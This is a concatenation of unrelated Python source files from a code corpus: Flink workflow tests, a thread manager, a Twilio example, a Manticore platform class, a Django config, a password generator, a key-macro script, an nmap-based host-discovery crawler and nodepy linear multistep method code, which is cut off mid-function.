# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
import os
import time
import shutil
from ai_flow import AIFlowServerRunner, init_ai_flow_context
from ai_flow.workflow.status import Status
from ai_flow_plugins.job_plugins import flink
from test_flink_processor import Source, Sink, Transformer, Transformer2
import ai_flow as af
project_path = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
class TestFlink(unittest.TestCase):
    """End-to-end tests for the AI Flow Flink job plugin: local and
    cluster execution, job cancellation, and a Java job submission."""

    @classmethod
    def setUpClass(cls) -> None:
        # One AI Flow server instance is shared by every test in the class.
        config_file = project_path + '/master.yaml'
        cls.master = AIFlowServerRunner(config_file=config_file)
        cls.master.start()

    @classmethod
    def tearDownClass(cls) -> None:
        cls.master.stop()
        # Remove artifacts produced by workflow submission.
        generated = '{}/generated'.format(project_path)
        if os.path.exists(generated):
            shutil.rmtree(generated)
        temp = '{}/temp'.format(project_path)
        if os.path.exists(temp):
            shutil.rmtree(temp)

    def setUp(self):
        # Each test starts from an empty database and a fresh AI Flow graph.
        self.master._clear_db()
        af.current_graph().clear_graph()
        init_ai_flow_context()

    def tearDown(self):
        self.master._clear_db()

    def test_local_flink_task(self):
        """A local source -> transform -> sink pipeline runs to FINISHED."""
        with af.job_config('task_1'):
            input_example = af.user_define_operation(processor=Source())
            processed = af.transform(input=[input_example], transform_processor=Transformer())
            af.user_define_operation(input=[processed], processor=Sink())
        w = af.workflow_operation.submit_workflow(workflow_name=af.current_workflow_config().workflow_name)
        je = af.workflow_operation.start_job_execution(job_name='task_1', execution_id='1')
        je = af.workflow_operation.get_job_execution(job_name='task_1', execution_id='1')
        self.assertEqual(Status.FINISHED, je.status)

    def test_stop_local_flink_task(self):
        """Stopping a running local job leaves it FAILED with an error set."""
        with af.job_config('task_1'):
            input_example = af.user_define_operation(processor=Source())
            # Transformer2 runs long enough for the stop call to interrupt it.
            processed = af.transform(input=[input_example], transform_processor=Transformer2())
            af.user_define_operation(input=[processed], processor=Sink())
        w = af.workflow_operation.submit_workflow(workflow_name='test_python')
        je = af.workflow_operation.start_job_execution(job_name='task_1', execution_id='1')
        time.sleep(2)
        af.workflow_operation.stop_job_execution(job_name='task_1', execution_id='1')
        je = af.workflow_operation.get_job_execution(job_name='task_1', execution_id='1')
        self.assertEqual(Status.FAILED, je.status)
        self.assertTrue('err' in je.properties)

    @unittest.skip("need start flink cluster")
    def test_cluster_flink_task(self):
        """Same pipeline as the local test, but against a Flink cluster."""
        with af.job_config('task_2'):
            input_example = af.user_define_operation(processor=Source())
            processed = af.transform(input=[input_example], transform_processor=Transformer())
            af.user_define_operation(input=[processed], processor=Sink())
        w = af.workflow_operation.submit_workflow(workflow_name=af.current_workflow_config().workflow_name)
        je = af.workflow_operation.start_job_execution(job_name='task_2', execution_id='1')
        je = af.workflow_operation.get_job_execution(job_name='task_2', execution_id='1')
        self.assertEqual(Status.FINISHED, je.status)

    @unittest.skip("need start flink cluster")
    def test_cluster_stop_local_flink_task(self):
        """Stopping a cluster job leaves it FAILED with an error set."""
        with af.job_config('task_2'):
            input_example = af.user_define_operation(processor=Source())
            processed = af.transform(input=[input_example], transform_processor=Transformer2())
            af.user_define_operation(input=[processed], processor=Sink())
        w = af.workflow_operation.submit_workflow(workflow_name='test_python')
        je = af.workflow_operation.start_job_execution(job_name='task_2', execution_id='1')
        time.sleep(20)
        af.workflow_operation.stop_job_execution(job_name='task_2', execution_id='1')
        je = af.workflow_operation.get_job_execution(job_name='task_2', execution_id='1')
        self.assertEqual(Status.FAILED, je.status)
        self.assertTrue('err' in je.properties)

    @unittest.skip("need start flink cluster")
    def test_cluster_flink_java_task(self):
        """Submit Flink's bundled WordCount.jar and check it FINISHES."""
        flink_home = os.environ.get('FLINK_HOME')
        word_count_jar = os.path.join(flink_home, 'examples', 'batch', 'WordCount.jar')
        output_file = os.path.join(flink_home, 'log', 'output')
        # Remove output from any previous run so the job can write it fresh.
        if os.path.exists(output_file):
            os.remove(output_file)
        # Stage the jar where the Java processor expects project dependencies.
        jar_dir = os.path.join(project_path, 'dependencies', 'jar')
        if not os.path.exists(jar_dir):
            os.makedirs(jar_dir)
        shutil.copy(word_count_jar, jar_dir)
        args = ['--input', os.path.join(flink_home, 'conf', 'flink-conf.yaml'), '--output', output_file]
        with af.job_config('task_2'):
            af.user_define_operation(processor=flink.FlinkJavaProcessor(entry_class=None,
                                                                       main_jar_file='WordCount.jar',
                                                                       args=args))
        w = af.workflow_operation.submit_workflow(workflow_name=af.current_workflow_config().workflow_name)
        je = af.workflow_operation.start_job_execution(job_name='task_2', execution_id='1')
        je = af.workflow_operation.get_job_execution(job_name='task_2', execution_id='1')
        self.assertEqual(Status.FINISHED, je.status)
        # Clean up the staged dependencies directory.
        dep_dir = os.path.join(project_path, 'dependencies')
        if os.path.exists(dep_dir):
            shutil.rmtree(dep_dir)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
5045181 | <gh_stars>0
# standard libary
import threading
# term ticker
import commands
import tools.rss_tools as rss_tools
import tools.twitter_tools as twitter_tools
class TermTickerThreadManager():
    """Creates, tracks, and queries the daemon threads that feed each
    ticker window (monitor / rss / twitter).
    """
    def __init__(self, termticker_dict):
        # Window name -> name of the thread that services that window.
        self.window_dict = {
            'monitor' : 'monitor_thread',
            'rss' : 'rss_thread',
            'twitter' : 'twitter_thread'
        }
        # Thread name -> target callable for that thread.
        # NOTE(review): 'monitor_thread' maps to '' (not callable); starting
        # it via add_thread() would fail.  Confirm the intended monitor target.
        self.functions_dict = {
            'monitor_thread': '',
            'rss_thread' : rss_tools.rss_feed,
            'twitter_thread': twitter_tools.twitter_feed
        }
        # User command name -> bound handler method.
        self.commands_dict = {
            'alive' : self.call_check_thread,
            'exit' : self.call_exit_thread
        }
        # Thread name -> running threading.Thread instance.
        self.threads = {}
        # Shared state dict, also passed to each thread target as kwargs.
        self.termticker_dict = termticker_dict

    ### Utility commands
    def add_thread(self, name):
        """Start the daemon thread registered under ``name`` and track it.

        The shared ``termticker_dict`` is unpacked as keyword arguments to
        the thread's target function.
        """
        thread = threading.Thread(name = name,
                                  target = self.functions_dict[name],
                                  kwargs = self.termticker_dict)
        thread.daemon = True
        thread.start()
        self.threads[name] = thread

    def check_thread(self, window_name):
        """Return True if the thread serving ``window_name`` is alive."""
        return self.threads[self.window_dict[window_name]].is_alive()

    def exit_thread(self, window_name):
        """Attempt to stop the thread serving ``window_name``.

        Bug fix: the original referenced the bare name ``window_dict``
        (a guaranteed NameError at runtime); it must be ``self.window_dict``.
        """
        if not self.check_thread(window_name):
            # NOTE(review): threading.Thread has no ``exit()`` method, so this
            # call raises AttributeError if ever reached, and the guard above
            # only fires for threads that are already dead.  Daemon threads
            # cannot be force-stopped from outside; a cooperative shutdown
            # flag is needed for a real implementation.
            self.threads[self.window_dict[window_name]].exit()

    ### Callable Commands
    def call_check_thread(self, window_key, command_key, args):
        """Report whether the window's thread is alive via the input window."""
        if self.check_thread(window_key):
            is_alive = 'alive'
        else:
            is_alive = 'not alive'
        commands.print_warning(self.termticker_dict['input_window'],
                               'Thread is ' + is_alive + '. Press ' + \
                               'any key to continue.')

    def call_exit_thread(self, window_key, command_key, args):
        """Kill the window's thread and report it via the input window."""
        self.exit_thread(window_key)
        commands.print_warning(self.termticker_dict['input_window'],
                               window_key + ' thread has been killed. ' + \
                               'Press any key to continue.')
| StarcoderdataPython |
3388134 | # Download the Python helper library from twilio.com/docs/python/install
# Demo: accept a TaskRouter reservation for a worker via the Twilio REST API.
from twilio.rest import TwilioTaskRouterClient

# Your Account Sid and Auth Token from twilio.com/user/account
# (placeholders -- fill in real credentials before running).
account_sid = "<KEY>"
auth_token = "<PASSWORD>"
# TaskRouter resource identifiers: workspace, worker, and reservation.
workspace_sid = "WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
worker_sid = "WKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
reservation_sid = 'WRXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

client = TwilioTaskRouterClient(account_sid, auth_token)

# accept a reservation
reservation = client.workers(workspace_sid) \
    .get(worker_sid).reservations \
    .update(reservation_sid, reservation_status='accepted')

print(reservation.reservation_status)
print(reservation.worker_name)
| StarcoderdataPython |
12829014 | <gh_stars>0
import wrapt
import logging
from ..utils.event import Eventful
logger = logging.getLogger(__name__)
class OSException(Exception):
    """Base class for OS-emulation errors raised by platform code."""
    pass
@wrapt.decorator
def unimplemented(wrapped, _instance, args, kwargs):
    """Decorator for syscall models: logs a warning (including the guest PC
    when it can be determined) before delegating to the stub implementation."""
    # Best-effort lookup of the current CPU / program counter for context.
    cpu = getattr(getattr(_instance, "parent", None), "current", None)
    addr = None if cpu is None else cpu.read_register("PC")
    # NOTE(review): the f-string prefix is redundant -- the placeholders are
    # %-style and are filled in lazily by the logging call's extra arguments.
    logger.warning(
        f"Unimplemented system call%s: %s(%s)",
        "" if addr is None else " at " + hex(addr),
        wrapped.__name__,
        ", ".join(hex(a) for a in args),
    )
    return wrapped(*args, **kwargs)
class SyscallNotImplemented(OSException):
    """
    Exception raised when you try to call an unimplemented system call.
    Go to linux.py and add it!
    """

    def __init__(self, idx, name):
        # Build the message inline; no need for an intermediate variable.
        super().__init__(f'Syscall index "{idx}" ({name}) not implemented.')
class ConcretizeSyscallArgument(OSException):
    """Raised to request concretization of a symbolic syscall argument.

    Carries the register number to concretize, a human-readable message,
    and the solver policy to apply.
    """

    def __init__(self, reg_num, message="Concretizing syscall argument", policy="SAMPLED"):
        self.reg_num = reg_num
        self.message = message
        self.policy = policy
        super().__init__(message)
class Platform(Eventful):
    """
    Base class for all platforms e.g. operating systems or virtual machines.
    """

    def __init__(self, path, **kwargs):
        # ``path`` (the program to emulate) is accepted for subclass use but
        # is not stored by this base class.
        super().__init__(**kwargs)

    def invoke_model(self, model, prefix_args=None):
        # Delegate to the platform's function ABI to marshal arguments and
        # call the model.  NOTE(review): ``_function_abi`` is expected to be
        # provided by subclasses -- it is not defined here.
        self._function_abi.invoke(model, prefix_args)

    def __setstate__(self, state):
        # Pickling support: delegate entirely to Eventful.
        super().__setstate__(state)

    def __getstate__(self):
        state = super().__getstate__()
        return state

    def generate_workspace_files(self):
        # Subclasses may return a {filename: contents} mapping of artifacts
        # to persist in the workspace; the base class has none.
        return {}
| StarcoderdataPython |
9747482 | <gh_stars>0
from django.apps import AppConfig
from django.contrib.admin.apps import AdminConfig
class BlogAdminConfig(AdminConfig):
    # Replace Django's default admin site with the project's customized one.
    default_site = "blog.admin.BlogAdminArea"
class BlogConfig(AppConfig):
    # Use 64-bit auto-incrementing primary keys for models in this app.
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'blog'
| StarcoderdataPython |
3450675 | <filename>Scripts/Miscellaneous/GUI Password Generator/passwordGenerator.py
from tkinter import *
import string
import random
# Main application window.
root = Tk()
root.title("Password Generator - By Rohit")
root.geometry("1000x700")
root.wm_iconbitmap("pass.ico")  # expects pass.ico next to the script
# Function to generate a password and display it in the text area.
def generate():
    """Build a password of passLen characters from the pool selected via the
    passType radio buttons (1=PIN, 2=AlphaNumeric, 3=Extreme Secure) and show
    it in TextArea.

    NOTE(review): relies on the module-level tkinter variables/widgets
    (passLen, passType, TextArea) defined later in this script.
    """
    length = passLen.get()
    if length == 0:
        # Keep original behavior: prompt for a length without clearing the box.
        TextArea.insert(1.0, "Please Enter password length.")
        return
    TextArea.delete(1.0, END)
    # One character pool per password type; replaces four near-identical branches.
    pools = {
        1: string.digits,
        2: string.ascii_lowercase + string.digits,
        3: string.ascii_lowercase + string.ascii_uppercase
           + string.digits + string.punctuation,
    }
    pool = pools.get(passType.get())
    if pool is None:
        TextArea.insert(1.0, "Invalid Password Type\n")
        return
    # random.choices samples WITH replacement, so the password always has the
    # requested length. The old shuffle-and-slice approach silently capped the
    # length at the pool size (e.g. a 12-digit PIN came back 10 digits) and
    # never repeated a character, which weakens the password.
    # NOTE: for security-critical use, prefer the `secrets` module.
    password = "".join(random.choices(pool, k=length))
    TextArea.insert(1.0, f"Your password is : {password}")
# Tk variables driving the generator: requested length and selected type.
passLen = IntVar()
passLen.set(0)
passType = IntVar()
Label(root, text="Welcome to Password Generator", font="lucida 20 bold").pack(pady=10)
f1 = Frame(root)
# Label for Enter Password length
l1 = Label(f1, text="Enter password length", font="lucida 10 bold")
l1.grid(row=1, column=3, pady=20)
# Entry widget bound to passLen
e1 = Entry(f1, textvariable=passLen)
e1.grid(row=1, column=5)
# Radiobuttons for password type (values match the branches in generate()).
# NOTE(review): r1..r3 hold None — .grid() returns None, not the widget.
r1 = Radiobutton(f1, text="PIN", value=1, variable=passType, padx=10, font="lucida 12").grid(row=2, column=4, )
r2 = Radiobutton(f1, text="AlphaNumeric", value=2, variable=passType, padx=10, font="lucida 12").grid(row=3, column=4)
r3 = Radiobutton(f1, text="Extreme Secure", value=3, variable=passType, padx=10, font="lucida 12").grid(row=4, column=4)
# Submit Button triggers generate()
b1 = Button(f1, text="Submit", command=generate, font="lucida 12")
b1.grid(row=5, column=4, pady=10)
# Textarea to show the generated password
TextArea = Text(f1)
TextArea.grid(row=6, column=4)
f1.pack()
root.mainloop() | StarcoderdataPython |
6676783 | import random
import keyboard
import pyautogui
import time
#IMPORT THE HELL OUT OF THE CODE HAHHAHAHAHAHHA
keysss=['up','down','left','right']
# Direction keys pressed by loop(); change to match the emulator's bindings.
def loop():
    """Take three steps in random directions while holding 'x'.

    'x' should be bound to the emulator's run/B button so the character
    runs instead of walks.
    """
    for _ in range(3):
        direction = random.choice(keysss)
        pyautogui.keyDown('x')
        pyautogui.keyDown(direction)
        pyautogui.keyUp(direction)
        pyautogui.keyUp('x')
def z():
    """Replay a fixed tap pattern on the 'z' (interact/A) key, four times.

    The pattern (key action, pause after it) reproduces the original timing
    exactly; the 3.5 s pause waits out a dialog/animation in between.
    Key names can be checked with print(pyautogui.KEY_NAMES).
    """
    pattern = [
        ('down', 0.2), ('down', 0.0), ('up', 0.2), ('up', 3.5),
        ('down', 0.2), ('down', 0.2), ('up', 0.2), ('up', 0.0),
    ]
    for _ in range(4):
        for action, pause in pattern:
            press = pyautogui.keyDown if action == 'down' else pyautogui.keyUp
            press('z')
            if pause:
                time.sleep(pause)
# Hotkeys: '/' walks three random steps, ',' replays the interact sequence.
# Change these bindings to whatever you prefer.
keyboard.add_hotkey('/',lambda:loop())
keyboard.add_hotkey(',',lambda:z())
# Block on stdin so the process (and its hotkey listeners) stays alive.
input()
| StarcoderdataPython |
6538583 | # Version 4.0
#!/usr/bin/env python
# nmap -p 80,8000,8080,8088 tiny.splunk.com
# nmap -sP -T insane -oG foo mcdavid/24
#
# grepable = -oG
# OS = -O
#
# sudo nmap tiny
# sudo nmap -O tiny/24
# sudo nmap -sX -O tiny
# nmap -v -O tiny
#
import os, time, stat, re, sys, subprocess
import crawl
import logging as logger
NETWORKCMD = "nmap %s/%s"
# !! need to ensure no quotes, spaces, ;, etc. no funny business in command.
def exeCommand(command, input = ""):
    """Run *command* (split naively on single spaces), write *input* plus a
    trailing newline to its stdin, and return its captured stdout as text.

    NOTE(review): callers must not pass quoted or shell-special arguments;
    the command string is split on ' ' only and no shell is involved.
    """
    logger.info("network crawl = %s" % command)
    # universal_newlines=True puts the pipes in text mode so passing/receiving
    # str works on Python 3 (communicate() would otherwise require bytes).
    p = subprocess.Popen(command.split(' '), stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                         universal_newlines=True)
    output = p.communicate(input + "\n")[0]
    return output
class NetworkCrawler(crawl.Crawler):
    """Crawler that discovers hosts on a subnet by running nmap and turning
    each reported open-port line into an AddHostAction event."""
    def __init__(self, mgr, args):
        # Crawler name defaults to "network" when the caller supplies none.
        name = args.get("name", "network")
        crawl.Crawler.__init__(self, name, mgr, args)
        self.network_info = {}
        # GET SETTINGS (index/host/subnet fall back to defaults when unset)
        logger.info("network crawl settings = '%s'" % self.settings)
        self.index = self.getSetting("index", "main")
        self.host = self.getSetting("host", "localhost")
        self.subnet = self.getSetting("subnet", "64")
    def execute(self):
        """Run one crawl pass and wrap every parsed port as an AddHostAction."""
        # CRAWL
        events = self._doCrawl()
        # CREATE RESULT ACTIONS
        actions = []
        for event in events:
            event['_time'] = time.time()
            event['crawler_type'] = self.name
            event['index'] = self.index
            actions.append(crawl.AddHostAction(event))
        return actions
    def _doCrawl(self):
        """Run nmap against host/subnet and parse 'port/proto state service'
        lines from its output into one dict per matched line."""
        lines = (exeCommand( NETWORKCMD % (self.host, self.subnet) )).split('\n')
        events = []
        for line in lines:
            # Matches e.g. "80/tcp open http"; all other nmap output is ignored.
            match = re.match("^(?P<_raw>(?P<portnum>\d+)/(?P<type>\S+)\s+(?P<state>\S+)\s+(?P<service>\S+))$", line)
            if match:
                events.append(match.groupdict())
        return events
| StarcoderdataPython |
6562062 | <reponame>pinkieli/nodepy<gh_stars>0
"""
**Examples**::
>>> import nodepy.linear_multistep_method as lm
>>> ab3=lm.Adams_Bashforth(3)
>>> ab3.order()
3
>>> bdf2=lm.backward_difference_formula(2)
>>> bdf2.order()
2
>>> bdf2.is_zero_stable()
True
>>> bdf7=lm.backward_difference_formula(7)
>>> bdf7.is_zero_stable()
False
>>> bdf3=lm.backward_difference_formula(3)
>>> bdf3.A_alpha_stability()
86
>>> ssp32=lm.elm_ssp2(3)
>>> ssp32.order()
2
>>> ssp32.ssp_coefficient()
1/2
>>> ssp32.plot_stability_region() #doctest: +ELLIPSIS
<matplotlib.figure.Figure object at 0x...>
"""
from __future__ import print_function
from __future__ import absolute_import
import numpy as np
import sympy
import nodepy.snp as snp
from nodepy.general_linear_method import GeneralLinearMethod
from six.moves import map
from six.moves import range
class LinearMultistepMethod(GeneralLinearMethod):
    r"""
    Implementation of linear multistep methods in the form:
    `\alpha_k y_{n+k} + \alpha_{k-1} y_{n+k-1} + ... + \alpha_0 y_n
    = h ( \beta_k f_{n+k} + ... + \beta_0 f_n )`
    Methods are automatically normalized so that \alpha_k=1.
    Notes: Representation follows Hairer & Wanner p. 368, NOT Butcher.
    **References**:
        #. [hairer1993]_ Chapter III
        #. [butcher2003]_
    """
    def __init__(self,alpha,beta,name='Linear multistep method',shortname='LMM',
                 description=''):
        # Normalize so the leading coefficient alpha[k] equals 1.
        self.beta = beta /alpha[-1]
        self.alpha = alpha/alpha[-1]
        self.name = name
        self.shortname = shortname
        # Fix: was `description is not ''` — identity comparison with a string
        # literal, which is unreliable and a SyntaxWarning on modern CPython.
        if description:
            self.info = description
        else:
            if self.is_explicit():
                exp_str = "Explicit"
            else:
                exp_str = "Implicit"
            self.info = "%s %d-step method of order %d" % (exp_str, len(self), self.order())
    def __num__(self):
        """
        Returns a copy of the method but with floating-point coefficients.
        This is useful whenever we need to operate numerically without
        worrying about the representation of the method.
        """
        import copy
        numself = copy.deepcopy(self)
        if self.alpha.dtype==object:
            numself.alpha=np.array(self.alpha,dtype=np.float64)
            numself.beta=np.array(self.beta,dtype=np.float64)
        return numself
    def characteristic_polynomials(self):
        r"""
        Returns the characteristic polynomials (also known as generating
        polynomials) of a linear multistep method.  They are:
        `\rho(z) = \sum_{j=0}^k \alpha_k z^k`
        `\sigma(z) = \sum_{j=0}^k \beta_k z^k`
        **Examples**::
            >>> from nodepy import lm
            >>> ab5 = lm.Adams_Bashforth(5)
            >>> rho,sigma = ab5.characteristic_polynomials()
            >>> print(rho)
               5     4
            1 x - 1 x
            >>> print(sigma)
                  4         3         2
            2.64 x - 3.853 x + 3.633 x - 1.769 x + 0.3486
        **References**:
            #. [hairer1993]_ p. 370, eq. 2.4
        """
        # poly1d wants highest-degree coefficient first, hence the reversal.
        rho=np.poly1d(self.alpha[::-1])
        sigma=np.poly1d(self.beta[::-1])
        return rho, sigma
    def order(self,tol=1.e-10):
        r""" Return the order of the local truncation error of a linear multistep method.
        **Examples**::
            >>> from nodepy import lm
            >>> am3=lm.Adams_Moulton(3)
            >>> am3.order()
            4
        """
        # Increase p until the order-(p+1) conditions fail.
        p = 0
        while True:
            if self._satisfies_order_conditions(p+1,tol):
                p = p + 1
            else:
                return p
    def _satisfies_order_conditions(self,p,tol):
        """ Return True if the linear multistep method satisfies
            the conditions of order p (only) """
        ii=snp.arange(len(self.alpha))
        return abs(sum(ii**p*self.alpha-p*self.beta*ii**(p-1)))<tol
    def absolute_monotonicity_radius(self):
        # For LMMs, the radius of absolute monotonicity is the SSP coefficient.
        return self.ssp_coefficient()
    @property
    def p(self):
        # Shorthand for the method's order.
        return self.order()
    def latex(self):
        r"""
        Print a LaTeX representation of a linear multistep formula.
        **Example**::
            >>> from nodepy import lm
            >>> print(lm.Adams_Bashforth(2).latex())
            \begin{align} y_{n + 2} - y_{n + 1} = \frac{3}{2}h f(y_{n + 1}) - \frac{1}{2}h f(y_{n})\end{align}
        """
        from sympy import symbols, latex
        n = symbols('n')
        from nodepy.snp import printable
        k = len(self)
        alpha_terms = []
        beta_terms = []
        # Build one term per nonzero coefficient, highest index first.
        for i in range(k+1):
            subscript = latex(n+k-i)
            if self.alpha[k-i] != 0:
                alpha_terms.append(printable(self.alpha[k-i],return_one=False) +
                                   ' y_{'+subscript+'}')
            if self.beta[k-i] != 0:
                beta_terms.append(printable(self.beta[k-i],return_one=False) +
                                  'h f(y_{'+subscript+'})')
        lhs = ' + '.join(alpha_terms)
        rhs = ' + '.join(beta_terms)
        s = r'\begin{align}'+ ' = '.join([lhs,rhs]) + r'\end{align}'
        # Collapse "+ -coef" into "-coef" for readable output.
        s = s.replace('+ -','-')
        return s
    def ssp_coefficient(self):
        r""" Return the SSP coefficient of the method.
        The SSP coefficient is given by
        `\min_{0 \le j < k} -\alpha_k/beta_k`
        if `\alpha_j<0` and `\beta_j>0` for all `j`, and is equal to
        zero otherwise.
        **Examples**::
            >>> from nodepy import lm
            >>> ssp32=lm.elm_ssp2(3)
            >>> ssp32.ssp_coefficient()
            1/2
            >>> bdf2=lm.backward_difference_formula(2)
            >>> bdf2.ssp_coefficient()
            0
        """
        if np.any(self.alpha[:-1]>0) or np.any(self.beta<0):
            return 0
        return min([-self.alpha[j]/self.beta[j]
                    for j in range(len(self.alpha)-1) if self.beta[j]!=0])
    def plot_stability_region(self,N=100,bounds=None,color='r',filled=True, alpha=1.,
                              to_file=False,longtitle=False):
        r"""
        The region of absolute stability of a linear multistep method is
        the set
        `\{ z \in C : \rho(\zeta) - z \sigma(zeta) \text{ satisfies the root condition} \}`
        where `\rho(zeta)` and `\sigma(zeta)` are the characteristic
        functions of the method.
        Also plots the boundary locus, which is
        given by the set of points z:
        `\{z | z=\rho(\exp(i\theta))/\sigma(\exp(i\theta)), 0\le \theta \le 2*\pi \}`
        Here `\rho` and `\sigma` are the characteristic polynomials
        of the method.
        References:
            [leveque2007]_ section 7.6.1
        **Input**: (all optional)
            - N       -- Number of gridpoints to use in each direction
            - bounds  -- limits of plotting region
            - color   -- color to use for this plot
            - filled  -- if true, stability region is filled in (solid); otherwise it is outlined
        """
        import matplotlib.pyplot as plt
        rho, sigma = self.__num__().characteristic_polynomials()
        # mag(z) is 1 (stable) or 0 (unstable); R below is then 0.5 or 1.5,
        # so contouring R at level 1 draws the stability boundary.
        mag = lambda z: _root_condition(rho-z*sigma)
        vmag = np.vectorize(mag)
        z = self._boundary_locus()
        if bounds is None:
            # Use boundary locus to decide plot region
            realmax, realmin = np.max(np.real(z)), np.min(np.real(z))
            imagmax, imagmin = np.max(np.imag(z)), np.min(np.imag(z))
            deltar, deltai = realmax-realmin, imagmax-imagmin
            bounds = (realmin-deltar/5.,realmax+deltar/5.,
                      imagmin-deltai/5.,imagmax+deltai/5.)
        y=np.linspace(bounds[2],bounds[3],N)
        Y=np.tile(y[:,np.newaxis],(1,N))
        x=np.linspace(bounds[0],bounds[1],N)
        X=np.tile(x,(N,1))
        Z=X+Y*1j
        R=1.5-vmag(Z)
        if filled:
            plt.contourf(X,Y,R,[0,1],colors=color,alpha=alpha)
        else:
            plt.contour(X,Y,R,[0,1],colors=color,alpha=alpha)
        fig = plt.gcf()
        ax = fig.get_axes()
        if longtitle:
            plt.setp(ax,title='Absolute Stability Region for '+self.name)
        else:
            plt.setp(ax,title='Stability region')
        # Draw the axes and overlay the boundary locus in black.
        plt.plot([0,0],[bounds[2],bounds[3]],'--k',linewidth=2)
        plt.plot([bounds[0],bounds[1]],[0,0],'--k',linewidth=2)
        plt.plot(np.real(z),np.imag(z),color='k',linewidth=3)
        plt.axis(bounds)
        plt.axis('image')
        if to_file:
            plt.savefig(to_file, transparent=True, bbox_inches='tight', pad_inches=0.3)
        plt.draw()
        return fig
    def plot_boundary_locus(self,N=1000,figsize=None):
        r"""Plot the boundary locus, which is
        given by the set of points
        `\{z | z=\rho(\exp(i\theta))/\sigma(\exp(i\theta)), 0\le \theta \le 2*\pi \}`
        where `\rho` and `\sigma` are the characteristic polynomials
        of the method.
        References:
            [leveque2007]_ section 7.6.1
        """
        import matplotlib.pyplot as plt
        z = self._boundary_locus(N)
        if figsize is None:
            plt.figure()
        else:
            plt.figure(figsize=figsize)
        plt.plot(np.real(z),np.imag(z),color='k',linewidth=3)
        plt.axis('image')
        bounds = plt.axis()
        plt.plot([0,0],[bounds[2],bounds[3]],'--k',linewidth=2)
        plt.plot([bounds[0],bounds[1]],[0,0],'--k',linewidth=2)
        plt.title('Boundary locus for '+self.name)
        plt.draw()
    def _boundary_locus(self, N=1000):
        r"""Compute the boundary locus, which is
        given by the set of points
        `\{z | z=\rho(\exp(i\theta))/\sigma(\exp(i\theta)), 0\le \theta \le 2*\pi \}`
        where `\rho` and `\sigma` are the characteristic polynomials
        of the method.
        References:
            [leveque2007]_ section 7.6.1
        """
        theta=np.linspace(0.,2*np.pi,N)
        zeta = np.exp(theta*1j)
        rho,sigma=self.__num__().characteristic_polynomials()
        z = rho(zeta)/sigma(zeta)
        return z
    def A_alpha_stability(self, N=1000, tol=1.e-14):
        r"""Angle of `A(\alpha)`-stability.
        The result is given in degrees.  The result is only accurate to
        about 1 degree, so we round down.
        **Examples**:
            >>> from nodepy import lm
            >>> bdf5 = lm.backward_difference_formula(5)
            >>> bdf5.A_alpha_stability()
            51
        """
        from math import atan2, floor
        z = self._boundary_locus(N)
        # Angle of each locus point, mapped to [0, 2*pi).
        rad = list(map(atan2,np.imag(z),np.real(z)))
        rad = np.mod(np.array(rad),2*np.pi)
        return min(int(floor(np.min(np.abs(np.where(np.real(z)<-tol,rad,1.e99)-np.pi))/np.pi*180)),90)
    def is_explicit(self):
        # Explicit iff the newest stage's RHS coefficient beta_k is zero.
        return self.beta[-1]==0
    def is_zero_stable(self,tol=1.e-13):
        r""" True if the method is zero-stable.
        **Examples**::
            >>> from nodepy import lm
            >>> bdf5=lm.backward_difference_formula(5)
            >>> bdf5.is_zero_stable()
            True
        """
        rho, sigma = self.characteristic_polynomials()
        return _root_condition(rho,tol)
    def __len__(self):
        r"""Returns the number of steps used."""
        return len(self.alpha)-1
class AdditiveLinearMultistepMethod(GeneralLinearMethod):
    r"""
    Method for solving equations of the form
    `y'(t) = f(y) + g(y)`
    The method takes the form
    `\alpha_k y_{n+k} + \alpha_{k-1} y_{n+k-1} + ... + \alpha_0 y_n
    = h ( \beta_k f_{n+k} + ... + \beta_0 f_n
    + \gamma_k g_{n+k} + ... + \gamma_0 g_n )`
    Methods are automatically normalized so that \alpha_k=1.
    The usual reference for these is Ascher, Ruuth, and Whetton.
    But we follow a different notation (as just described).
    """
    def __init__(self, alpha, beta, gamma, name='Additive linear multistep method'):
        # Normalize by alpha[k]; beta is the implicit part, gamma the explicit.
        self.beta = beta /alpha[-1]
        self.gamma = gamma/alpha[-1]
        self.alpha = alpha/alpha[-1]
        self.name = name
        # The two component LMMs (implicit and explicit parts, respectively).
        self.method1 = LinearMultistepMethod(alpha, beta)
        self.method2 = LinearMultistepMethod(alpha, gamma)
    def __num__(self):
        """
        Returns a copy of the method but with floating-point coefficients.
        This is useful whenever we need to operate numerically without
        worrying about the representation of the method.
        """
        import copy
        numself = copy.deepcopy(self)
        if self.alpha.dtype == object:
            numself.alpha = np.array(self.alpha, dtype=np.float64)
            numself.beta = np.array(self.beta, dtype=np.float64)
            numself.gamma = np.array(self.gamma, dtype=np.float64)
        return numself
    def order(self,tol=1.e-10):
        r""" Return the order of the local truncation error of an additive
             linear multistep method.  The output is the minimum of the
             order of the component methods.
        """
        orders = []
        for method in (self.method1,self.method2):
            # Same search as LinearMultistepMethod.order, per component.
            p = 0
            while True:
                if method._satisfies_order_conditions(p+1,tol):
                    p = p + 1
                else:
                    orders.append(p)
                    break
        return min(orders)
    def plot_imex_stability_region(self,both_real=False,N=100,color='r',filled=True,
                                   alpha=1.,fignum=None,bounds=[-10, 1, -5, 5]):
        r"""Plot the IMEX stability region on an (implicit, explicit) grid.
        When both_real is False the explicit eigenvalue is taken imaginary.
        **Input**: (all optional)
            - N       -- Number of gridpoints to use in each direction
            - bounds  -- limits of plotting region
            - color   -- color to use for this plot
            - filled  -- if true, stability region is filled in (solid); otherwise it is outlined
        NOTE(review): the mutable default `bounds=[...]` is shared across
        calls; it is only read here, but callers should not mutate it.
        """
        import matplotlib.pyplot as plt
        rho, sigma1 = self.method1.__num__().characteristic_polynomials()
        rho, sigma2 = self.method2.__num__().characteristic_polynomials()
        # mag(a, b) = largest root magnitude of the stability polynomial.
        if both_real:
            mag = lambda a, b: _max_root(rho - a*sigma1 - b*sigma2)
        else:
            mag = lambda a, b: _max_root(rho - a*sigma1 - 1j*b*sigma2)
        vmag = np.vectorize(mag)
        y = np.linspace(bounds[2],bounds[3],N)
